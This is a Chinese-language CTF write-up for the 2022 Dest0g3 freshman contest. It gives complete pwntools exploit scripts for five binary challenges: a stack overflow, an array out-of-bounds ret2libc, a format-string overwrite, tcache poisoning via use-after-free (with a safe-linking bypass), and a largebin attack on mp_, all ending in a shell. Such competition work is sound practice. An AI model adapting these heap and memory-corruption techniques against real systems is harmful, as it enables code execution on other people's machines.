2022 Dest0g3 520迎新赛 PWN wp

比赛感悟,就一个字,*,打pwn的libc版本不确定,很烦,做出了5/7个,其它两道题,也是倒在了libc环境上就没心情做了

ez_aarch
一道ARM的栈题,程序给了个后门,修改返回地址为后门即可
exp:

from pwn import *
context.log_level = "debug"
p = remote("node4.buuoj.cn",29527)
#p=process("./stack")
payload = b"A"*0X28+p8(0x3f)
p.sendafter("Please leave your name:\n",payload)
p.interactive()

ez_pwn
数组越界,直接越界到返回地址即可

from pwn import *
#from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
elf = ELF('./ez_pwn')
# libc = elf.libc
p = process('./ez_pwn')
#p = remote('node4.buuoj.cn', 26638)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

def choice(idx):
    p.recvuntil('choice:')
    p.sendline(str(idx))
    sleep(0.1)

def add(pay):
    choice(1)
    p.recvuntil('num')
    p.sendline(str(pay))

p.sendlineafter('array:', '-2147483648')

# gdb.attach(p)

for i in range(9):
    add(0x0badf00d)
choice(3)
add(0x7fffffff)
add(0x7fffffff)
add(0x7fffffff)
add(17)
add(puts_plt)
add(0x8049408)
add(puts_got)
print(hex(puts_plt))
print(hex(puts_got))
choice(4)

p.recvuntil('!\n')
libc=ELF("/lib/i386-linux-gnu/libc.so.6")
# p.recv(8)
puts_addr = u32(p.recv(4))
print(hex(puts_addr))
base=puts_addr-0x67560#0x6dc30
print hex(base)
bin_sh=base+next(libc.search("/bin/sh\x00"))
system=base+libc.sym['system']
system=base+0x3cf10
bin_sh=base+0x17b9db
print hex(bin_sh)
print hex(system)
p.sendlineafter('array:', '-1')
for i in range(9):
        add(0x0badf00d)
add(0x7fffffff)
add(0x7fffffff)
add(0x7fffffff)
add(17)
sy=system-4294967296
bi=bin_sh-4294967296
print sy
print bi
add(sy)
add(0)
add(bi)
choice(4)
p.interactive()

dest_love
bss格式化字符串,这道题恶心住了,环境不一样导致我找不到一些可利用的二次指针,在Ubuntu20找到了

from pwn import *

p = remote("node4.buuoj.cn", "25335")
#p = process("./pwn")
elf = ELF("./pwn")
#gdb.attach(p)
p.sendlineafter("?\n", "%16$p|%26$p|")
elf.address = int(p.recvuntil("|")[:-1], 16) - 0x10A0
stack = int(p.recvuntil("|")[:-1], 16) - 0xb8

info("stack base => 0x%x"%stack)
info("libc base  => 0x%x"%elf.address)
check = elf.address + 0x4010
info("check addr => 0x%x"%check)

payload = ""
payload += "%"
payload += "%d"%(stack & 0xffff)
payload += "c"
payload += "%26$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%(check & 0xffff)
payload += "c"
payload += "%39$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%(0x0ED8)
payload += "c"
payload += "%16$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%((check & 0xffff) + 2)
payload += "c"
payload += "%39$hn"

p.sendlineafter("?\n", payload)

payload = ""
payload += "%"
payload += "%d"%(0x14)
payload += "c"
payload += "%16$hhn"

p.sendlineafter("?\n", payload)

p.interactive()

ezuaf
uaf,打的tc stru为xff,可以任意申请,这里写了两个版本的exp,第一次是在libc2.31打的,本地通了远程吉尔,本来不想打了,结果还是在libc2.33版本做了出来,环境吉尔,要不然二血,呜呜呜,libc2.32之后的版本有指针保护,写的时候绕过下即可。吉尔吉尔。。。。
exp:
libc2.31:

from pwn import *

p=process("./pwn")
#p=remote("node4.buuoj.cn","28524")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def new(size,con):
    p.sendlineafter(": ",'1')
    p.sendlineafter("size: \n",str(size))
    p.sendlineafter("Content: ",con)

def edit(idx,con):
    p.sendlineafter(": ",'2')
    p.sendlineafter("index: \n",str(idx))
    p.sendlineafter("content: ",con)
def free(idx):
    p.sendlineafter(": ",'3')
    p.sendlineafter("index: \n",str(idx))

def show(idx):
    p.sendlineafter(": ",'4')
    p.sendlineafter("index: \n",str(idx))


for i in range(7):
    new(0x80,'a')

new(0x68,'b')
new(0x60,'/bin/sh\x00')
free(1)
free(2)
free(7)
show(2)
heap_base=u64(p.recv(6).ljust(8,"\x00"))-0x330
print hex(heap_base)
l=heap_base
edit(4,p64(0)+p64(0x221))
edit(2,p64(l))
new(0x80,'d') #1
new(0x80,'\xff'*0x20)
#for i in range(7):
#    free(i)
free(0)
show(0)

libc_base=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))-0x1ecbe0
system=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
rce=libc_base+0xe3b2e
print hex(libc_base)
print hex(system)
print hex(free_hook)
edit(7,p64(free_hook))
'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
new(0x68,'a')
new(0x68,p64(system))
free(8)
p.interactive()

libc2.33:

from pwn import *

p=process("./pwn")
libc=ELF("/home/roo/Desktop/tools/glibc-all-in-one-master/libs/2.33-0ubuntu5_amd64/libc.so.6")
def new(size,con):
    p.sendlineafter(": ",'1')
    p.sendlineafter("size: \n",str(size))
    p.sendlineafter("Content: ",con)

def edit(idx,con):
    p.sendlineafter(": ",'2')
    p.sendlineafter("index: \n",str(idx))
    p.sendlineafter("content: ",con)
def free(idx):
    p.sendlineafter(": ",'3')
    p.sendlineafter("index: \n",str(idx))

def show(idx):
    p.sendlineafter(": ",'4')
    p.sendlineafter("index: \n",str(idx))


for i in range(7):
    new(0x80,'a')

new(0x68,'b')
new(0x60,'/bin/sh\x00')
free(1)
free(2)
free(7)
show(1)
heap_base=u64(p.recv(6).ljust(8,"\x00"))<<12#<<12#-0x330
print hex(heap_base)
edit(4,p64(0)+p64(0x221))
b=heap_base+0x3c0
edit(2,p64(heap_base^(b>>12)))
new(0x80,'d') #1
new(0x80,'\xff'*0x20)
#for i in range(7):
#    free(i)
free(0)
show(0)

libc_base=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))-0x1e0c00#-0x219cc0#-0x1ecbe0
print hex(libc_base)
system=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
rce=libc_base+0xe3b2e
print hex(libc_base)
print hex(system)
print hex(free_hook)
f=heap_base+0x690
edit(7,p64((free_hook)^(f>>12))+p64(free_hook))
'''
0xe3b2e execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b31 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b34 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''
new(0x68,p64(0xb))
fh=free_hook-0x8
#p.sendlineafter(": ",'1')
#p.sendlineafter("size: \n","0x68")
#p.sendlineafter("Content: ",p64(system)*8)
#new(0x68,p64(system))
#new(0x68,p64(system))
new(0x68,p64(system))
free(8)
p.interactive()

emma
我这里打的mp_,tc stru溢出,这里偏移是一个一个在源码调试出来的,麻烦死了,调这个题调吐了,还是动调yyds
exp:

from pwn import *


p=process("./ff")
def add(idx,size,con):
    p.sendlineafter(">>\n",'1')
    p.sendlineafter("Index: \n",str(idx))
    p.sendlineafter("Size: \n",str(size))
    p.sendlineafter("Content\n",con)
def edit(idx,con):
    p.sendlineafter(">>\n",'2')
    p.sendlineafter("Index: \n",str(idx))
    p.sendlineafter("Content\n",con)
def show(idx):
    p.sendlineafter(">>\n",'3')
    p.sendlineafter("Index: \n",str(idx))

def dele(idx):
    p.sendlineafter(">>\n",'4')
    p.sendlineafter("Index: \n",str(idx))

add(0,0x440,'a')
add(1,0x430,'b'*0x430)
add(2,0x430,'ddd')
add(10,0x1000,'d'*0x1000)
dele(0)
show(0)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc_base=u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))-0x1ecbe0
print hex(libc_base)
#add(17,0x440,'asdasdasdasdasd')
free_hook=libc_base+libc.sym['__free_hook']
add(8,0x460,'adasd')
edit(0,'a'*16)
show(0)
p.recvuntil('a'*0x10)
heap=u64(p.recv(6).ljust(8, '\x00'))-0x20a
print hex(heap)
mp_bins=libc_base+0x1ec2d0
edit(0,p64(libc_base+0x1ecff0)*2+p64(heap+0x290)+p64(mp_bins-0x20))
dele(2)
add(3,0x460,'/bin/sh\x00')
add(5,0x430,'dd')
#add(7,0x890,'aaa')
edit(0,p64(libc_base+0x1ecfe0)*2+p64(heap+0x290)+p64(heap+0x290))
add(0,0x440,'a')
dele(10)
system=libc_base+libc.sym['system']
#add(1,0x660,'aaa')
edit(1,'a'*0x188+p64(free_hook)*3)
add(11,0x1000,p64(system))
dele(3)

p.interactive()

总结:不给libc,不确定其版本,一点体验都没有,盲打吗。,真无语死 了。。。。。。。。。。

本文链接:

http://azly.top/index.php/archives/59/
1 + 6 =
快来做第一个评论的人吧~